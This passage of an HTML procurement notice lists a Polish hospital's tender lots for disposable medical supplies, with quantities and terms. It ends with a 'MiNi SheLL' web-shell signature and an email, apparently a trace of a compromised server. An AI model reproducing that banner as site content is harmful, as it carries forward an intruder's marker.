Zestaw do ewakuacji płynu z opłucnej (wyposażone w kranik trójdrożny)		szt.	15      
Zestaw do ewakuacji płynu z opłucnej (wyposażone w kranik trójdrożny)  z automatyczną zapadką		szt.	15      
Zatyczka do cewnika moczowego, dla drenów o średnicach od 6 ch do 35 ch, budowa schodkowa, pakowana pojedynczo, sterylna,1op=50szt		op	20      
Zestaw do kaniulacji dużych naczyń 6F/20		szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj:
Zestaw uniwersalny szt.	350      
Zestaw podstawowy szt.	50      
Zestaw do cięcia cesarskiego szt.	100      
Zestaw do operacji ginekologicznych szt.	35      
Zestaw porodowy szt.	200      
Obłożenie stolika Mayo w kształcie worka  o wymiarach 80x145 cm. szt.	200      
Kieszeń samoprzylepna składająca się z jednej sekcji o wymiarach 30x32 cm		szt.	50      
Osłona zabezpieczająca kable video i optykę endoskopową o wym. 13x250 cm  		szt.	100      
Fartuchy chirurgiczne - jednorazowy, szt.	600      
Klasyczna maska chirurgiczna trójwarstwowa, wiązana na troki. szt.	4000      
Czepek chirurgiczny w kształcie beretu. szt.	2000      
Czepek chirurgiczny typu furażerka, szt.	600      
Serweta gazowa niejałowa z kontrastem RTG i tasiemką 20 nitek,szt.	500      
Serweta jałowa nieprzylepna,	
Rozmiar 50x50 cm		szt.	400      
Rozmiar 75x75 cm		szt.	50      
Rozmiar 75x90 cm		szt.	50      
Rozmiar 100x150 cm	szt.	150      
Serweta jałowa samoprzylepna, 	
Rozmiar 75x90 cm		szt.	100      
Rozmiar 170x175 cm	szt.	40      
Rozmiar 150x240 cm	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj: 
Baseny plastikowe szt.	10 
Fartuch niesterylny ze ściągaczem  przy mankietach, fizelinowy, szt.	400   
Fartuch ochronny foliowy  1 x użytku szt.	800      
Kaczki plastikowe	 szt.	10      
Kanki do odbytnicze 30 x 300 wykonana z PCW  j.u. jałowe  szt.	100      
Kieliszki do leków - plastikowe,  op	50      
Ochraniacze foliowe  na buty, ściągane gumką 	para	700      
Podkład bibułowy 2-warstwowy, perforowany, 60cm x 80m	rolka	20      
Podkład bibułowy 2-warstwowy, perforowany, 50cm x 80m	rolka	20      
Pojemnik do pobierania kału z łopatką szt.	100      
Pojemnik do pobierania moczu z nakrętką -120 ml szt.	100      
Pojemnik na zużyte  igły - pojemność 0,5-0,8 L, plastik, szt.	350      
Pojemnik na zużyte  igły - pojemność 1,8-2,0 L plastik,  szt.	600      
Pojemnik na zużyte  igły - pojemność 3,0 - 3,5 L, plastik, szt. 350      
Prześcieradło nieprzemakalne włóknowo - foliowe - niesterylne szt. 1100      
Spodenki jednorazowe z otworem do kolonoskopii szt.	300      
Staza bezlateksowa do uciskania żyły przy pobieraniu krwi, rolka	100      
Staza automatyczna szt. 30      
Sterylna folia operacyjna do obłożeń chirurgicznych rozm. 28 x 30 cm szt. 50
Sterylna folia operacyjna do obłożeń chirurgicznych rozm. 30 x 40 cm szt. 50
Szpatułki drewniane op.100 szt. op	100      
Jednorazowe pojemniki do pobierania moczu od noworodków i niemowląt, op	50      
Worki  na zwłoki,	szt.	150      
Worki do zbiórki moczu z odpływem 2L szt. 1000      
Zaciskacz do pępowiny, czysty mikrobiologicznie, szt.	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj:
Elektroda Holter Stress LLL-510	szt.	7500      
Papier do USG Mitsubishi K-61B rozm. 110mm x 20mb	szt.	30      
Papier do USG Mitsubishi K-65 HM-ce rozm. 110mm x 20mb		szt.	20      
Papier rejestracyjny do aparatu EKG firmy Aspel do modeli: Wymiary rolki 104 mm x 40m, op. 1 szt.	szt.	40      
Papier rejestracyjny do aparatu EKG firmy Aspel do modeli: Wymiary rolki 112 mm x 25m op. 1 szt.	szt.	100      
Papier rejestracyjny do aparatu EKG firmy Aspel do modeli:  Wymiary rolki 58 mm x 25m op. 1 szt	szt.	50      
Papier rejestracyjny do aparatu EKG firmy Farum do modeli: Multicard E-30 .Wymiary rolki 100 mm x 40m, op. 1 szt	szt.	40      
Papier termiczny do aparatu KTG OXFORD SRF 618B-210, rozmiar papieru 112 x 100 x 150.	szt.	50      
Papier do KTG KONTRON  (126 mm x 75 x mm x 200)	szt.	40      
Papier do KTG Sonicad Oxford TEAM  (143x150x300)	szt.	40      
Papier do KTG Cadence  (112x90x150)	szt.	40      
Papier do KTG BFM-10 firmy BRAEL    szer. 110mm x 20mb	szt.	40      
Papier do defibrylatora Zoll M Series szer. 90 mm, szer. Siatki 80mm szt.	30      
Papier do defibrylatora LIFEPAK 15   108x25	szt.	50      
Żel do EKG  250 g	szt.	50      
Żel do USG  500 ml	szt.	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj:
Papier do sterylizacji  krepowany - biały 120 x 120  100 arkuszy	szt.	15      
Papier do sterylizacji  krepowany - zielony 120 x 120  100 arkuszy szt.	20      
Rękawy foliowo -papierowe bez zakładki rozmiar 50 mm x 200 m szt.	6      
Rękawy foliowo -papierowe bez zakładki rozmiar 100 mm x 200 m 	szt.	15      
Rękawy foliowo -papierowe bez zakładki rozmiar 150 mm x 200 m 	szt.	10      
Rękawy foliowo -papierowe bez zakładki rozmiar 200 mm x 200 m 	szt.	15      
Rękawy foliowo -papierowe bez zakładki rozmiar 300 mm x 200 m 	szt.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj:
Test Arkuszowy Bowie - Dick,  kolor niebieski, op. = 50 szt	op.	5      
Taśma samoprzylepna bez wskaźnika  (neutralna), do zamykania pakietów  2,50 cm x 50 m	szt.	30      
Taśma wskaźnikowa zewnętrzna kontrolna para wodna 19 mm x 50 m	szt.	15      
Test biologiczny do sterylizacji parą wodną, wskaźniki typu sporal		szt.	50      
Wskaźnik wieloparametrowy do kontroli sterylizacji parowej kl. 4, op. 250/500, test paskowy papierowy bez laminatu, kontrola sterylizacji para wodna, opak.= 250 szt	op.	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj:
Aerozolowy preparat do utrwalania pobranych na szkiełka mikroskopowe rozmazów biologicznych  pojemność 150 ml	Szt.	15
Szczoteczki cytologiczne -  jednorazowego użytku  - typ Wachlarz	Szt.	2000
Szkiełka cytologiczne cięte matowe 1 mm - (op. 50 szt)	op.	25
Wziernik pochwowy ginekologiczny  jednorazowego użytku, regulowany i blokowany poprzez użycie centralnej szpili, wchodzącej w uchwyt górny	Szt.	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj:
Szybki test ureazowy do wykrywania Helicobacter pylori w biopatach żołądka lub dwunastnicy, poprzez badanie wycinków, pobranych endoskopowo.	szt.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj:
Pętle 1x użytku (jednorazowe), elektrochirurgiczne, owalne, średnica pętli A  10mm    szt.	30      
Pętle 1x użytku (jednorazowe), elektrochirurgiczne, owalne, średnica pętli A   25mm    szt. 10      
Igły jednorazowe do ostrzykiwania z osłonką teflonową   długość ostrza igły A - 4mm    - średnica igły B  21G = 0,8mm	szt.	20      
Igły jednorazowe do ostrzykiwania z osłonką teflonową  długość robocza 2300 mm       - długość ostrza igły A - 4mm   - średnica igły B  23G = 0,6mm szt.	10      
Filtr do ssaka endoskopowego pompy ssącej SSU-2		szt.	40      
Filtr do ssaka endoskopowego pompy płuczącej OFP-2		szt.	40      
Jednorazowa szczoteczka dwustronna (do czyszczenia kanałów endoskopów), 50 szt w opakowaniu, długość 2200mm.	op	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj:
Stapler liniowy 80mm z nożem, szt.	3      
Ładunek do staplera liniowego z nożem o długości 80 mm szt.3      
Stapler okrężny zagięty jednorazowego użytku, średnicy od 28 mm do 33 mmszt.	3      
Stapler liniowy,45 mm, szt.	3      
Ładunek do staplera liniowego 45mm, szt.	6      
Stapler liniowy,60 mm, szt.	3      
Ładunek do staplera liniowego 60mm, szt.	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> sukcesywne dostawy sprzętu medycznego
 jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> sukcesywne dostawy sprzętu medycznego jednorazowego użytku tj:
Jednorazowa dzielona elektroda neutralna bez kabla dla dorosłych i dzieci, Dzielona powierzchnia przewodząca min 65 cm2, Wymiary: Długość elektrody min 120 mm, Szerokość elektrody min 115 mm, 	szt.	200      
Jednorazowa dzielona elektroda neutralna bez kabla dla dorosłych i dzieci, Dzielona powierzchnia przewodząca min 105 cm2, Wymiary: Długość elektrody min 120 mm, Szerokość elektrody min. 165 mm,	szt.	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com